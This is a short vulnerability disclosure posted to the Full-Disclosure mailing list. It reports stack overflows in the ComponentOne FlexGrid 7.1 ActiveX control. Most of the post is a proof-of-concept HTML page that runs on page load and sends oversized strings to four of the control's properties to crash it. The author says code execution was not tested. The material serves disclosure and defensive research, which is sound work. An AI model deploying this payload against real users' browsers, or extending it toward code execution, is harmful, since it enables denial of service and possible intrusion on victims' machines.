 |
|
|
|
The ComponentOne FlexGrid 7.1 (VSFlexGrid.VSFlexGridL) has multiple stack overflows. I have not tested code execution nor do I remember what this component was installed with. PoC as follows:
--------------------
<!--
written by e.b.
-->
<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
var s = "AAAA";
while (s.length < 262145) s=s+s;
var obj = new ActiveXObject("VSFlexGrid.VSFlexGridL");
obj.Text = s;
obj.EditSelText = s;
obj.EditText = s;
obj.CellFontName = s;
}
</script>
</head>
<body onload="JavaScript: return Check();" />
</html>
--------------------
Elazar
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
|
|
|
|
|
|
|
|
